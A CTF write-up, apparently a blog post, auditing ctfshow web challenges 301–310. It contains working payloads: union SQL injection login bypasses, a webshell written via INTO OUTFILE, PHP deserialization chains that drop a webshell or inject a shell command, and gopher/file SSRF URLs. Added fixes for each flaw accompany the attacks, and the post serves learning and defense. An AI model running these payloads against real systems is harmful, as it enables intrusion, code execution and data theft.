Getting started with ctfshow web (code audit)
2022-07-21 18:32:00 【Ff. cheng】
301
Download the source code and look at it: the username has no protection at all, so there is SQL injection, and the table name and column name are already known.
```php
// $username is spliced straight into the query text: this is the injection point.
$sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;";
$result=$mysqli->query($sql);
$row=$result->fetch_array(MYSQLI_BOTH);
if($result->num_rows<1){
    $_SESSION['error']="1";
    header("location:login.php");
    return;
}
// The stored sds_password is compared (case-insensitively) with the POSTed password.
if(!strcasecmp($userpwd,$row['sds_password'])){
    $_SESSION['login']=1;
    $result->free();
    $mysqli->close();
    header("location:index.php");
    return;
}
```
Run sqlmap:
Make the value found in the database equal to the password sent by POST:
the user enters a username, the corresponding password is looked up in the database, and then it is compared with the password the user entered.
So the 1 from our union select (think of it as the returned sds_password) is compared with the password 1 that we pass, and the comparison returns true.
Union injection:
username: ' union select 1#
userpwd: 1
You can also try writing a one-line webshell into a file:
'union select "<?php eval($_POST[shell]);?>" into outfile "/var/www/html/shell.php"%23
302
What changed:
if(!strcasecmp(sds_decode($userpwd),$row['sds_password']))
```php
<?php
function sds_decode($str){
    return md5(md5($str.md5(base64_encode("sds")))."sds");
}
?>
```
The only difference is that the password entered by the user is now run through the sds_decode method before the comparison, so the value we union select has to be sds_decode of the password we send.
Payload:
```php
<?php
$str="1";
$a=md5(md5($str.md5(base64_encode("sds")))."sds");
echo $a;
?>
```
' union select 'd9c77c4e454869d5d8da3b4be79694d3'%23&userpwd=1
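As an added example (not code from the ctfshow challenge), this is how the 301/302 login check looks once the two defects the writeup exploits are fixed: the username becomes a bound parameter instead of being spliced into the SQL text, and the case-insensitive strcasecmp is replaced by hash_equals. It assumes an existing $mysqli connection, the same sds_user table, and the challenge's own sds_decode helper; check_login is a hypothetical name.

```php
<?php
// Added example, not the challenge's own code.
// Same helper as 302, reproduced so the file runs stand-alone.
function sds_decode($str){
    return md5(md5($str.md5(base64_encode("sds")))."sds");
}

// Returns true only when a row for $username exists and its stored
// sds_password equals sds_decode($userpwd).
function check_login(mysqli $mysqli, string $username, string $userpwd): bool {
    // Prepared statement: $username travels as a bound parameter, never as
    // part of the SQL text, so "' union select ..." is just an odd username
    // that matches no row.
    $stmt = $mysqli->prepare(
        "SELECT sds_password FROM sds_user WHERE sds_username = ? ORDER BY id LIMIT 1"
    );
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param("s", $username);
    $stmt->execute();
    $stmt->bind_result($stored);
    $found = $stmt->fetch();   // true when a row was read, null when none
    $stmt->close();

    if (!$found) {
        return false;
    }
    // hash_equals is constant-time and case-sensitive; strcasecmp in the
    // original is neither, and it can only ever see the value the (attacker-
    // controlled) query returned.
    return hash_equals((string)$stored, sds_decode($userpwd));
}

// Usage with constructed connection details (replace with the real ones):
// $mysqli = new mysqli("127.0.0.1", "user", "pass", "ctfshow");
// if (check_login($mysqli, $_POST['username'] ?? '', $_POST['userpwd'] ?? '')) {
//     $_SESSION['login'] = 1;
// }
```

With the query fixed, the union trick from 301 and 302 no longer has anything to work with: the comparison only ever runs against a sds_password that actually belongs to the supplied username.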
303-304
Log in with admin/admin.
Close the first single quote and forge the address field for injection:
1',sds_address =(select group_concat(table_name) from information_schema.tables where table_schema=database())#
305
Check the waf on each parameter.
waf:
SQL injection is not possible.
class.php contains a dangerous function:
Deserialization exists:
Serialize the one-line webshell and encode it:
Connect to the database with AntSword:
306
admin
admin1
Notice that the close method of the log class in class.php contains a dangerous function.
dao.php's __destruct calls into class.php and invokes the close method:
We need to initialize log in __construct, so that __destruct ends up calling log's close method.
index.php includes dao.php and has a deserialization call, so the deserialization is triggered in index.php.
index.php -> dao.php -> class.php -> close()
Payload:
```php
<?php
class log{
    public $title='cys.php';
    public $info='<?php eval($_POST[shell]);?>';
}
class dao{
    private $conn;
    public function __construct(){
        $this->conn=new log();
    }
}
echo base64_encode(serialize(new dao()));
?>
```
307
dao.php:
service.php can call the clearCache method in dao.php.
Tracing further up:
logout.php calls the method.
config.php
cache_dir is controllable:
cache_dir can be customized and is the parameter of the dao class's clearCache method; logout.php then calls the dao class, which runs shell_exec with it.
payload:
```php
<?php
class config{
    public $cache_dir = ';echo `cat /var/www/html/f*` > flag.txt;'; // you can also write a webshell here
}
class dao{
    private $config;
    public function __construct(){
        $this->config=new config();
    }
}
echo base64_encode(serialize(new dao()));
?>
```
Access:
URL/controller/flag.txt
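The 305 to 307 chains all rest on the same two weaknesses: user data is handed to unserialize(), so the client decides which classes (and therefore which __destruct/close methods) get instantiated, and a property of the resulting object (cache_dir) is spliced into a shell_exec call. The following is an added example, not the challenge's code, showing one way to close both; load_state and clear_cache are hypothetical names and the cache root path is a constructed placeholder.

```php
<?php
// Added example, not from the ctfshow source.

// 1. Never let a cookie or parameter pick the classes that get built.
//    allowed_classes => false makes any object in the payload come back as
//    __PHP_Incomplete_Class, so no dao/config/log constructor or destructor
//    runs. Scalars and arrays are all this state ever needed.
function load_state(string $raw) {
    $decoded = base64_decode($raw, true);
    if ($decoded === false) {
        return null;
    }
    $data = @unserialize($decoded, ['allowed_classes' => false]);
    if ($data === false || is_object($data)) {
        return null;   // malformed, or it tried to smuggle an object in
    }
    return $data;
}

// 2. Even trusted input should not be glued into a shell command.
//    cache_dir is pinned to a single path component under a fixed root and
//    the files are removed with PHP's own filesystem calls, so there is no
//    command line for ';' or backticks to break into.
function clear_cache(string $cache_dir, string $base = '/var/www/html/cache'): bool {
    if (!preg_match('/^[A-Za-z0-9_\-]+$/', $cache_dir)) {
        return false;   // rejects ';', '`', '/', '..' and friends
    }
    $real_base = realpath($base);
    $target    = realpath($base . '/' . $cache_dir);
    if ($real_base === false || $target === false
        || strpos($target, $real_base . DIRECTORY_SEPARATOR) !== 0) {
        return false;   // missing, or resolved to somewhere outside the root
    }
    foreach (glob($target . '/*') ?: [] as $file) {
        if (is_file($file)) {
            unlink($file);
        }
    }
    return true;
}

// Constructed sample values: a plain array survives, an object payload is dropped,
// and the 307 style cache_dir never reaches any command.
$benign   = base64_encode(serialize(['theme' => 'dark']));
$poisoned = base64_encode(serialize(new stdClass()));
var_dump(load_state($benign));
var_dump(load_state($poisoned));
var_dump(clear_cache(';echo `cat /var/www/html/f*` > flag.txt;'));
```

If the stored state really does need objects, the allowlist should name exactly those classes (['allowed_classes' => ['config']]) and none of them should do anything in __construct, __destruct or __wakeup; a JSON encoding of the same data avoids the question entirely.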
308
The filter only allows letters:
The writeup says an SSRF point is found in fun.php:
dao.php calls it.
index.php calls the method.
config.php
Similar to the previous challenge:
index.php -> config.php -> dao.php
```php
<?php
class config{
    public $update_url = 'gopher://127.0.0.1:3306/……';
}
class dao{
    private $config;
    public function __construct(){
        $this->config=new config();
    }
}
$a=new dao();
echo base64_encode(serialize($a));
?>
```
The specific value is generated with Gopherus.
Download address: https://github.com/tarunkant/Gopherus
3306 is the default MySQL port.
Question: isn't a MySQL password needed? It may be empty.
309
Need to get a shell; the 308 method doesn't work because MySQL has a password.
Since MySQL has a password and can't be hit, thinking about it there is basically nothing left but redis and fastcgi. Probing with dict, it doesn't look like redis, so most likely it is fastcgi, but I was at a loss as to how to confirm that fastcgi exists.
Took a look at Master Yu's approach, using the delay of the gopher protocol:
Writing it down first; I'll understand it after the SSRF section.
Payload as above.
310
nginx can connect to PHP through fastcgi, so the nginx configuration file will also contain important information; in addition there is port forwarding and the like, so there may be important information in the configuration file.
Master Yu:
9000 and 6379 are both closed. Then we can try reading the configuration file.
```php
<?php
class config{
    public $update_url = 'file:///etc/nginx/nginx.conf';
}
class dao{
    private $config;
    public function __construct(){
        $this->config=new config();
    }
}
$a=new dao();
echo base64_encode(serialize($a));
?>
```
Result:
```nginx
server {
    listen 4476;
    server_name localhost;
    root /var/flag;
    index index.html;
    proxy_set_header Host $host;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
}
```
Visit port 4476:
```php
<?php
class config{
    public $update_url = 'http://127.0.0.1:4476';
}
class dao{
    private $config;
    public function __construct(){
        $this->config=new config();
    }
}
$a=new dao();
echo base64_encode(serialize($a));
?>
```
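Across 308 to 310 the same update_url property is pointed at gopher://, dict://, file:// and finally an internal HTTP port, which is what an unrestricted fetch allows. As an added example (not the challenge's code), the check below allowlists the scheme, host and port before anything is fetched, so every one of those payload URLs is refused. It assumes the fetch is done with curl, as the working gopher:// payload suggests; is_safe_update_url, fetch_update and the updates.example.com host are constructed placeholders.

```php
<?php
// Added example, not from the ctfshow source.

// Constructed placeholder: the only host the updater is allowed to talk to.
const ALLOWED_UPDATE_HOSTS = ['updates.example.com'];

function is_safe_update_url(string $url, array $allowed_hosts = ALLOWED_UPDATE_HOSTS): bool {
    $p = parse_url($url);
    if ($p === false || !isset($p['scheme'], $p['host'])) {
        return false;          // file:///etc/nginx/nginx.conf has no host at all
    }
    $scheme = strtolower($p['scheme']);
    if (!in_array($scheme, ['http', 'https'], true)) {
        return false;          // gopher://, dict://, file:// are out
    }
    if (isset($p['user']) || isset($p['pass'])) {
        return false;          // http://allowed@127.0.0.1/ style confusion
    }
    if (!in_array(strtolower($p['host']), $allowed_hosts, true)) {
        return false;          // 127.0.0.1, localhost, internal names
    }
    // Only the scheme's default port: blocks http://host:4476 style probing
    // even against an allowed host.
    if (isset($p['port']) && $p['port'] !== ($scheme === 'https' ? 443 : 80)) {
        return false;
    }
    return true;
}

function fetch_update(string $url): ?string {
    if (!is_safe_update_url($url)) {
        return null;
    }
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false,   // a redirect must not reopen the door
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_CONNECTTIMEOUT => 3,
        CURLOPT_TIMEOUT        => 5,
    ]);
    $body = curl_exec($ch);
    curl_close($ch);
    return $body === false ? null : $body;
}

// The three update_url values from the 308-310 payloads, plus one allowed URL:
foreach ([
    'gopher://127.0.0.1:3306/',
    'file:///etc/nginx/nginx.conf',
    'http://127.0.0.1:4476',
    'https://updates.example.com/latest',
] as $u) {
    echo $u, ' => ', is_safe_update_url($u) ? 'allowed' : 'blocked', PHP_EOL;
}
```

Two caveats worth keeping in mind: a hostname allowlist still trusts DNS, so a name that resolves to an internal address (or is rebound between check and fetch) needs the resolved IP checked as well, and CURLOPT_PROTOCOLS plus FOLLOWLOCATION=false are what stop a 3xx from the allowed host from redirecting the client to gopher:// or an internal port.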